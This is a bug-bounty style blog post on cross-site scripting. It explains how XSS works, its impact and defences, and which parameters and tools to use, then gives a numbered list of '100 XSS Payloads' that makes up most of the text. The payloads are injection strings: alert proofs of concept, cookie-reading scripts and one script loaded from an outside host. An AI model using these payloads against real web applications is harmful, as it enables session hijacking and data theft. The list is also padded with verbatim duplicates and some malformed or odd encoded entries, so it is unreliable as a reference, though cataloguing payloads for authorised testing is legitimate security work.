Cross-Site Scripting (XSS) | Bug Bounty

What Is Cross-Site Scripting(XSS)?

Cross-Site Scripting (XSS) is a type of security vulnerability that enables an attacker to inject malicious code into a website or web application. The attacker’s code is then executed in the user’s browser, allowing the attacker to take control of the user’s session, steal their data, or perform other malicious actions.

How does Cross-Site Scripting work?

Cross-Site Scripting works by exploiting a web application’s lack of proper input validation. A web application is vulnerable to XSS if it fails to validate user input, meaning that it does not properly restrict what type of data can be entered. An attacker can then use this vulnerability to inject malicious code into the web application, which is then executed in the user’s browser.

What is the impact of Cross-Site Scripting?

The impact of Cross-Site Scripting can vary depending on the type of attack and the information that is being targeted. In general, XSS can be used to steal sensitive user information such as passwords, credit card numbers, or other confidential data. It can also be used to hijack user sessions, redirect users to malicious websites, or even execute malicious code on the user’s machine.

How can I protect myself from Cross-Site Scripting?

The best way to protect yourself from Cross-Site Scripting is to ensure that your web application is properly secured against this type of attack. This includes validating user input to ensure that only the expected data is being inputted, and sanitizing user input to ensure that any malicious code is removed before it can be executed. Additionally, you should use an up-to-date web application firewall to protect against known XSS attacks.

How to Find Cross Site scripting

Finding Cross-Site Scripting (XSS) vulnerabilities can be done manually or using automated tools. Manual testing involves manually inspecting the code to look for potential vulnerabilities, while automated tools can be used to scan for potential XSS vulnerabilities. Additionally, there are tools available that can be used to test for XSS vulnerabilities on a live website or web application.

Parameters to find Cross Site scripting

When looking for Cross-Site Scripting (XSS) vulnerabilities, it is important to look for parameters that are vulnerable to injection. Some of the most common parameters that can be used to inject malicious code are URL parameters, form fields, cookies, and headers. Additionally, it is important to look for any parameters that are not properly validated or sanitized, as these can be used to inject malicious code.

– URL parameters

– Form fields

– Cookies

– Headers

– Query strings

– POST requests

– JavaScript variables

– HTML attributes

– Referer headers

– User-agent headers

Tools For Finding Cross Site Scripting

There are a number of tools available for finding Cross-Site Scripting (XSS) vulnerabilities. Some of the most popular tools include Burp Suite, OWASP Zed Attack Proxy (ZAP), and Acunetix. Additionally, there are a number of tools available that can be used to scan a website or web application for potential XSS vulnerabilities.

100 XSS Payloads

1. <script>alert(1)</script>
2. <img src=# onerror=alert(1)>
3. <svg/onload=alert(1)>
4. <script/src=data:,alert(1)>
5. <script>document.write('<script>alert(1)</script>')</script>
6. <iframe/src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
7. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
8. <iframe/src="javascript:alert(1)">
9. <img/src=` onerror=alert(1)>
10. <iframe/onload=alert(1)>
11. <svg><script>alert(1)</script>
12. "><script>alert(1)</script>
13. <script>alert(String.fromCharCode(88,83,83))</script>
14. <img/[email protected]&#32;&#13; onerror=alert(1)>
15. <svg><script>alert("XSS")</script>
16. <form><button formaction="javascript:alert(1)">
17. '"--><script>alert(1)</script>
18. <script>"alert(1)"</script>
19. <div/onmouseover='alert(1)'> style="x:"><script>alert(1)</script>
20. <iframe/src="data:text/html,<script>alert(1)</script>">
21. <a href="javasc&#x0A;ript:alert(1)">
22. <img/src=`%00` onerror=alert(1)>
23. <iframe/onreadystatechange=alert(1)>
24. <script>document.write("<script>alert(1)</script>")</script>
25. <img/[email protected]&#32;&#13;&#10; onerror=alert(1)>
26. <svg><script>a='hello';alert(1)</script>
27. <script>alert(/XSS/.source)</script>
28. <object/data="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">
29. <script>document.body.appendChild(document.createElement('script')).src='data:text/javascript,alert(1)';</script>
30. <iframe/src="data:text/html,<svg><script>alert(1)</script>">
31. <img/src=`%00`&NewLine; onerror=alert(1)>
32. <div/onmouseover='alert(1)'> style="x:"><script>alert(1)//
33. <script>alert(1)>
34. <img/src=`%00`&tab; onerror=alert(1)>
35. <iframe/onreadystatechange=alert(1)//
36. <script>alert(document.cookie)</script>
37. <script>confirm(1)</script>
38. <form><button formaction=javascript:alert(1)>
39. <script>prompt(1)</script>
40. <img/[email protected]&#32;&#13; onerror=prompt(1)>
41. <svg><script>prompt(1)</script>
42. <input autofocus onfocus=alert(1)>
43. <input onblur=alert(1) autofocus><input autofocus>
44. <script>alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))</script>
45. '--!><script>alert(1)</script>
46. <script>alert(String.fromCharCode(88,83,83))</script>
47. <img src=# onerror=alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
48. <svg><script>alert("XSS")</script>
49. <div/onmouseover='alert(atob("ZXZhbChhbmFseXNlKDIpKQ=="))'> style="x:"><script>alert(1)</script>
50. <script>"alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))"</script>
51. <img/src=`%00` onerror=alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
52. <iframe/src="data:text/html;base64,PHNjcmlwdD5hbGVydChhdG9iKCdFWnZhbChhbmFseXNlKDIpKScpKTwvc2NyaXB0Pg==">
53. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydChhdG9iKCdFWnZhbChhbmFseXNlKDIpKScpKTwvc2NyaXB0Pg==">
54. <iframe/src="javascript:alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))">
55. <img/src=`@&#32;&#13;` onerror=alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
56. <svg><script>alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))</script>
57. "<script>alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))</script>
58. <iframe/onload=alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
59. <div/onmouseover='alert(atob("ZXZhbChhbmFseXNlKDIpKQ=="))'> style="x:"><script>alert(1)</script>
60. <script>document.write("<script>alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))</script>")</script>
61. <img/src=`@&#32;&#13;&#10;` onerror=alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
62. <svg><script>a='hello';alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))</script>
63. <script>alert(/XSS/.source)</script>
64. <object/data="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoYXRvYignRVp2YWwoYW5hbHlzZSgyKSkpJyk+">
65. <script>document.body.appendChild(document.createElement("script")).src='data:text/javascript,alert(atob("ZXZhbChhbmFseXNlKDIpKQ=="))';</script>
66. <iframe/src="data:text/html,<svg><script>alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))</script>">
67. <img/src=`%00`&NewLine; onerror=alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
68. <div/onmouseover='alert(atob("ZXZhbChhbmFseXNlKDIpKQ=="))'> style="x:"><script>alert(atob("ZXZhbChhbmFseXNlKDIpKQ=="))//
69. <script>alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
70. <img/src=`%00`&tab; onerror=alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
71. <iframe/onreadystatechange=alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))//
72. <script>alert(document.cookie)</script>
73. <script>confirm(atob('ZXZhbChhbmFseXNlKDIpKQ=='))</script>
74. <form><button formaction=javascript:alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
75. <script>prompt(atob('ZXZhbChhbmFseXNlKDIpKQ=='))</script>
76. <img/src=`@&#32;&#13;` onerror=prompt(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
77. <svg><script>prompt(atob('ZXZhbChhbmFseXNlKDIpKQ=='))</script>
78. <input autofocus onfocus=alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
79. <input onblur=alert(atob('ZXZhbChhbmFseXNlKDIpKQ==')) autofocus><input autofocus>
80. <script src=//14.rs>
81. <form><input onfocus=alert(1) autofocus>
82. <form><input onblur=alert(1) autofocus><input autofocus>
83. <script itworksinallbrowsers>alert(1)</script>
84. <img src=# onerror=alert(1)>
85. <svg/onload=alert(1)>
86. <iframe/src="data:,alert(1)>
87. <script>document.write('<script>alert(1)</script>')</script>
88. <iframe/src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
89. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
90. <iframe/src="javascript:alert(1)">
91. <img/src=` onerror=alert(1)>
92. <iframe/onload=alert(1)>
93. <svg><script>alert(1)</script>
94. '"--><script>alert(1)</script>
95. <script>"alert(1)"</script>
96. <div/onmouseover='alert(1)'> style="x:"><script>alert(1)</script>
97. <iframe/src="data:text/html,<script>alert(1)</script>">
98. <a href="javasc&#x0A;ript:alert(1)">
99. <img/src=`%00` onerror=alert(1)>
100. <iframe/onreadystatechange=alert(1)>

Leave a Reply